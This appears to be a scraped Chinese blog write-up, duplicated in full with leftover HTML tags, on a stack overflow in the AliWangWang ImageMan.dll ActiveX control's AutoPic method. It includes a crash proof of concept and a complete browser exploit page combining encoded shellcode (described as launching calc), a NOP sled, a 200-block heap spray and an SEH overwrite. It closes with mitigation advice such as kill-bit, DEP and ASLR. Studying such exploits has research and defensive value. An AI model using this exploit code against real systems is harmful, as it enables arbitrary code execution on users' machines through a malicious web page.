ImageMan.dll ActiveX控件栈溢出漏洞分析与利用<\/h1>

0x1 漏洞概述<\/h2>
漏洞名称<\/strong>: 阿里旺旺ActiveX控件ImageMan.dll栈溢出漏洞
漏洞类型<\/strong>: 栈缓冲区溢出
影响组件<\/strong>: ImageMan.dll (CLSID: 128D0E38-1FF4-47C3-B0F7-0BAF90F568BF)
危险等级<\/strong>: 高危
漏洞成因<\/strong>: AutoPic函数未对传入参数长度进行校验，导致栈缓冲区溢出
利用方式<\/strong>: 通过覆盖SEH异常处理结构指针实现任意代码执行<\/p>

0x2 环境准备<\/h2>
测试环境配置<\/h3>

组件<\/th> 版本\/配置<\/th> <\/tr> <\/thead>

操作系统<\/td> Windows XP SP3<\/td> <\/tr>
阿里旺旺版本<\/td> AliIM2010_taobao(6.50.00C)<\/td> <\/tr>
调试工具<\/td> OllyDbg (OD)<\/td> <\/tr>
浏览器<\/td> Internet Explorer<\/td> <\/tr> <\/tbody> <\/table>
0x3 漏洞分析<\/h2>
漏洞函数分析<\/h3>
漏洞位于ImageMan.dll中的AutoPic<\/code>函数，该函数导出为ActiveX控件方法，可通过JavaScript调用。<\/p>
关键问题<\/strong>:<\/p>
函数未对输入字符串长度进行校验<\/li> 使用不安全的字符串拷贝操作<\/li> 栈缓冲区大小固定但输入可控<\/li> <\/ul> 崩溃分析<\/h3> 当传入超长字符串时，函数会将数据拷贝到固定大小的栈缓冲区<\/li> 超出缓冲区范围的数据会覆盖栈上的关键数据<\/li> 最终会覆盖SEH异常处理结构指针<\/li> 触发异常后，程序执行流被劫持<\/li> <\/ol> 调试过程<\/h3> 定位调用点<\/strong>:<\/p> 在OLEAUT32模块的DispCallFunc<\/code>函数中设置断点<\/li> 跟踪call ecx<\/code>指令进入AutoPic函数<\/li> <\/ul> <\/li> 溢出点定位<\/strong>:<\/p> 函数地址0x10011CAC<\/code>处发生栈溢出<\/li> 观察栈区被"A"(0x41)字符填满<\/li> <\/ul> <\/li> 异常触发<\/strong>:<\/p> 溢出后堆栈平衡被破坏<\/li> 程序进入异常处理流程<\/li> SEH结构被覆盖导致控制流劫持<\/li> <\/ul> <\/li> <\/ol> 0x4 漏洞复现<\/h2> POC代码<\/h3> <html<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span><object<\/span> classid<\/span>=<\/span>"clsid:128D0E38-1FF4-47C3-B0F7-0BAF90F568BF"<\/span> id<\/span>=<\/span>"target"<\/span>><\/object<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span> var<\/span> buffer<\/span> =<\/span> ''<\/span>; <\/span><\/span> while<\/span> (buffer<\/span>.length<\/span> <<\/span> 1111<\/span>) buffer<\/span>+=<\/span>"A"<\/span>; <\/span><\/span> target<\/span>.AutoPic<\/span>(buffer<\/span>,"defaultV"<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>POC说明<\/strong>:<\/p> 创建长度为1111的"A"字符串<\/li> 通过AutoPic方法传入控件<\/li> 触发栈溢出导致程序崩溃<\/li> <\/ul> 0x5 漏洞利用<\/h2> 利用技术<\/h3> 堆喷射(Heap Spraying)<\/strong>:<\/p> 在内存中布置大量包含shellcode的堆块<\/li> 提高跳转地址命中shellcode的概率<\/li> <\/ul> <\/li> SEH覆盖<\/strong>:<\/p> 精确计算偏移覆盖SEH处理指针<\/li> 控制程序异常处理流程<\/li> <\/ul> <\/li> <\/ol> EXP代码<\/h3> <html<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span><object<\/span> classid<\/span>=<\/span>"clsid:128D0E38-1FF4-47C3-B0F7-0BAF90F568BF"<\/span> id<\/span>=<\/span>"target"<\/span>><\/object<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span> shellcode<\/span> =<\/span> unescape<\/span>('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'<\/span>+<\/span> <\/span><\/span> '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'<\/span>+<\/span> <\/span><\/span> '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'<\/span>+<\/span> <\/span><\/span> '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'<\/span>+<\/span> <\/span><\/span> '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'<\/span>+<\/span> <\/span><\/span> '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'<\/span>+<\/span> <\/span><\/span> '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'<\/span>+<\/span> <\/span><\/span> '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'<\/span>); <\/span><\/span> <\/span><\/span> nops<\/span>=<\/span>unescape<\/span>('%u9090%u9090'<\/span>); <\/span><\/span> headersize<\/span> =<\/span>20<\/span>; <\/span><\/span> slackspace<\/span>=<\/span> headersize<\/span> +<\/span> shellcode<\/span>.length<\/span>; <\/span><\/span> while<\/span>(nops<\/span>.length<\/span> <<\/span> slackspace<\/span>) nops<\/span>+=<\/span> nops<\/span>; <\/span><\/span> fillblock<\/span>=<\/span> nops<\/span>.substring<\/span>(0<\/span>, slackspace<\/span>); <\/span><\/span> block<\/span>=<\/span> nops<\/span>.substring<\/span>(0<\/span>, nops<\/span>.length<\/span>-<\/span> slackspace<\/span>); <\/span><\/span> while<\/span>( block<\/span>.length<\/span>+<\/span> slackspace<\/span><<\/span>0x50000<\/span>) block<\/span>=<\/span> block<\/span>+<\/span> block<\/span>+<\/span> fillblock<\/span>; <\/span><\/span> <\/span><\/span> memory<\/span>=<\/span>new<\/span> Array(); <\/span><\/span> for<\/span>( counter<\/span>=<\/span>0<\/span>; counter<\/span><<\/span>200<\/span>; counter<\/span>++<\/span>) memory<\/span>[counter<\/span>]=<\/span> block<\/span> +<\/span> shellcode<\/span>; <\/span><\/span> <\/span><\/span> s<\/span>=<\/span>''<\/span>; <\/span><\/span> for<\/span>( counter<\/span>=<\/span>0<\/span>; counter<\/span><=<\/span>1000<\/span>; counter<\/span>++<\/span>) s<\/span>+=<\/span>unescape<\/span>("%0D%0D%0D%0D"<\/span>); <\/span><\/span> target<\/span>.AutoPic<\/span>(s<\/span>,"defaultV"<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>EXP关键点解析<\/h3> Shellcode构造<\/strong>:<\/p> 使用unescape编码的shellcode<\/li> 本例中是弹出计算器的代码<\/li> <\/ul> <\/li> NOP雪橇<\/strong>:<\/p> 使用%u9090<\/code>构造NOP指令<\/li> 增加跳转命中率<\/li> <\/ul> <\/li> 堆喷射实现<\/strong>:<\/p> 创建大量内存块(200个)<\/li> 每个内存块包含NOP+shellcode<\/li> 填充内存增加shellcode出现概率<\/li> <\/ul> <\/li> 精确溢出<\/strong>:<\/p> 构造特定长度字符串(1000个"%0D")<\/li> 精确覆盖SEH处理指针<\/li> <\/ul> <\/li> <\/ol> 0x6 防护建议<\/h2> 厂商修复<\/strong>:<\/p> 增加输入参数长度校验<\/li> 使用安全字符串处理函数<\/li> <\/ul> <\/li> 临时缓解<\/strong>:<\/p> 禁用ImageMan.dll ActiveX控件<\/li> 设置kill-bit阻止控件加载<\/li> <\/ul> <\/li> 系统防护<\/strong>:<\/p> 启用DEP(数据执行保护)<\/li> 启用ASLR(地址空间布局随机化)<\/li> 使用最新版浏览器<\/li> <\/ul> <\/li> <\/ol> 0x7 总结<\/h2> 该漏洞是典型的ActiveX控件栈溢出漏洞，利用过程展示了：<\/p> 如何通过JavaScript调用有漏洞的ActiveX方法<\/li> 栈溢出漏洞的触发原理<\/li> SEH覆盖技术的实际应用<\/li> 堆喷射技术的实现方式<\/li> <\/ol> 此类漏洞的利用需要精确计算偏移量，并配合内存布局技术才能成功执行任意代码。<\/p>

组件<\/th>	版本\/配置<\/th> <\/tr> <\/thead>
操作系统<\/td>	Windows XP SP3<\/td> <\/tr>
阿里旺旺版本<\/td>	AliIM2010_taobao(6.50.00C)<\/td> <\/tr>
调试工具<\/td>	OllyDbg (OD)<\/td> <\/tr>
浏览器<\/td>	Internet Explorer<\/td> <\/tr> <\/tbody> <\/table> 0x3 漏洞分析<\/h2> 漏洞函数分析<\/h3> 漏洞位于ImageMan.dll中的`AutoPic<\/code>函数，该函数导出为ActiveX控件方法，可通过JavaScript调用。<\/p>` `关键问题<\/strong>:<\/p>` 函数未对输入字符串长度进行校验<\/li> 使用不安全的字符串拷贝操作<\/li> 栈缓冲区大小固定但输入可控<\/li> <\/ul> 崩溃分析<\/h3> 当传入超长字符串时，函数会将数据拷贝到固定大小的栈缓冲区<\/li> 超出缓冲区范围的数据会覆盖栈上的关键数据<\/li> 最终会覆盖SEH异常处理结构指针<\/li> 触发异常后，程序执行流被劫持<\/li> <\/ol> 调试过程<\/h3> 定位调用点<\/strong>:<\/p> 在OLEAUT32模块的DispCallFunc<\/code>函数中设置断点<\/li> 跟踪call ecx<\/code>指令进入AutoPic函数<\/li> <\/ul> <\/li> 溢出点定位<\/strong>:<\/p> 函数地址0x10011CAC<\/code>处发生栈溢出<\/li> 观察栈区被"A"(0x41)字符填满<\/li> <\/ul> <\/li> 异常触发<\/strong>:<\/p> 溢出后堆栈平衡被破坏<\/li> 程序进入异常处理流程<\/li> SEH结构被覆盖导致控制流劫持<\/li> <\/ul> <\/li> <\/ol> 0x4 漏洞复现<\/h2> POC代码<\/h3> <html<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span><object<\/span> classid<\/span>=<\/span>"clsid:128D0E38-1FF4-47C3-B0F7-0BAF90F568BF"<\/span> id<\/span>=<\/span>"target"<\/span>><\/object<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span> var<\/span> buffer<\/span> =<\/span> ''<\/span>; <\/span><\/span> while<\/span> (buffer<\/span>.length<\/span> <<\/span> 1111<\/span>) buffer<\/span>+=<\/span>"A"<\/span>; <\/span><\/span> target<\/span>.AutoPic<\/span>(buffer<\/span>,"defaultV"<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>POC说明<\/strong>:<\/p> 创建长度为1111的"A"字符串<\/li> 通过AutoPic方法传入控件<\/li> 触发栈溢出导致程序崩溃<\/li> <\/ul> 0x5 漏洞利用<\/h2> 利用技术<\/h3> 堆喷射(Heap Spraying)<\/strong>:<\/p> 在内存中布置大量包含shellcode的堆块<\/li> 提高跳转地址命中shellcode的概率<\/li> <\/ul> <\/li> SEH覆盖<\/strong>:<\/p> 精确计算偏移覆盖SEH处理指针<\/li> 控制程序异常处理流程<\/li> <\/ul> <\/li> <\/ol> EXP代码<\/h3> <html<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span><object<\/span> classid<\/span>=<\/span>"clsid:128D0E38-1FF4-47C3-B0F7-0BAF90F568BF"<\/span> id<\/span>=<\/span>"target"<\/span>><\/object<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span> shellcode<\/span> =<\/span> unescape<\/span>('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'<\/span>+<\/span> <\/span><\/span> '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'<\/span>+<\/span> <\/span><\/span> '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'<\/span>+<\/span> <\/span><\/span> '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'<\/span>+<\/span> <\/span><\/span> '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'<\/span>+<\/span> <\/span><\/span> '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'<\/span>+<\/span> <\/span><\/span> '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'<\/span>+<\/span> <\/span><\/span> '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'<\/span>); <\/span><\/span> <\/span><\/span> nops<\/span>=<\/span>unescape<\/span>('%u9090%u9090'<\/span>); <\/span><\/span> headersize<\/span> =<\/span>20<\/span>; <\/span><\/span> slackspace<\/span>=<\/span> headersize<\/span> +<\/span> shellcode<\/span>.length<\/span>; <\/span><\/span> while<\/span>(nops<\/span>.length<\/span> <<\/span> slackspace<\/span>) nops<\/span>+=<\/span> nops<\/span>; <\/span><\/span> fillblock<\/span>=<\/span> nops<\/span>.substring<\/span>(0<\/span>, slackspace<\/span>); <\/span><\/span> block<\/span>=<\/span> nops<\/span>.substring<\/span>(0<\/span>, nops<\/span>.length<\/span>-<\/span> slackspace<\/span>); <\/span><\/span> while<\/span>( block<\/span>.length<\/span>+<\/span> slackspace<\/span><<\/span>0x50000<\/span>) block<\/span>=<\/span> block<\/span>+<\/span> block<\/span>+<\/span> fillblock<\/span>; <\/span><\/span> <\/span><\/span> memory<\/span>=<\/span>new<\/span> Array(); <\/span><\/span> for<\/span>( counter<\/span>=<\/span>0<\/span>; counter<\/span><<\/span>200<\/span>; counter<\/span>++<\/span>) memory<\/span>[counter<\/span>]=<\/span> block<\/span> +<\/span> shellcode<\/span>; <\/span><\/span> <\/span><\/span> s<\/span>=<\/span>''<\/span>; <\/span><\/span> for<\/span>( counter<\/span>=<\/span>0<\/span>; counter<\/span><=<\/span>1000<\/span>; counter<\/span>++<\/span>) s<\/span>+=<\/span>unescape<\/span>("%0D%0D%0D%0D"<\/span>); <\/span><\/span> target<\/span>.AutoPic<\/span>(s<\/span>,"defaultV"<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>EXP关键点解析<\/h3> Shellcode构造<\/strong>:<\/p> 使用unescape编码的shellcode<\/li> 本例中是弹出计算器的代码<\/li> <\/ul> <\/li> NOP雪橇<\/strong>:<\/p> 使用%u9090<\/code>构造NOP指令<\/li> 增加跳转命中率<\/li> <\/ul> <\/li> 堆喷射实现<\/strong>:<\/p> 创建大量内存块(200个)<\/li> 每个内存块包含NOP+shellcode<\/li> 填充内存增加shellcode出现概率<\/li> <\/ul> <\/li> 精确溢出<\/strong>:<\/p> 构造特定长度字符串(1000个"%0D")<\/li> 精确覆盖SEH处理指针<\/li> <\/ul> <\/li> <\/ol> 0x6 防护建议<\/h2> 厂商修复<\/strong>:<\/p> 增加输入参数长度校验<\/li> 使用安全字符串处理函数<\/li> <\/ul> <\/li> 临时缓解<\/strong>:<\/p> 禁用ImageMan.dll ActiveX控件<\/li> 设置kill-bit阻止控件加载<\/li> <\/ul> <\/li> 系统防护<\/strong>:<\/p> 启用DEP(数据执行保护)<\/li> 启用ASLR(地址空间布局随机化)<\/li> 使用最新版浏览器<\/li> <\/ul> <\/li> <\/ol> 0x7 总结<\/h2> 该漏洞是典型的ActiveX控件栈溢出漏洞，利用过程展示了：<\/p> 如何通过JavaScript调用有漏洞的ActiveX方法<\/li> 栈溢出漏洞的触发原理<\/li> SEH覆盖技术的实际应用<\/li> 堆喷射技术的实现方式<\/li> <\/ol> 此类漏洞的利用需要精确计算偏移量，并配合内存布局技术才能成功执行任意代码。<\/p>